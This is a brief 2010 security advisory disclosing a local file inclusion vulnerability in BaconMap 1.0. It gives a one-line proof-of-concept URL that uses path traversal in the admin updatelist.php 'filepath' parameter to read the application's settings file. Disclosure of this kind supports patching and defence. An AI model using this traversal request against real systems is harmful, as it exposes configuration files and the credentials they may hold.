BaconMap version 1.0 suffers from a local file inclusion vulnerability.
b04e1f6e2fed624b7cdb49d5929580c4c6c4a99717bbbfa3bdbd8754f286f517
------------------------------------------------------------------------
Software................BaconMap 1.0
Vulnerability...........Local File Inclusion
Download................http://baconmap.nmsu.edu/
Release Date............10/10/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in BaconMap 1.0 can be exploited
to include arbitrary files.
--PoC--
http://localhost/baconmap/admin/updatelist.php?filepath=../includes/settings.php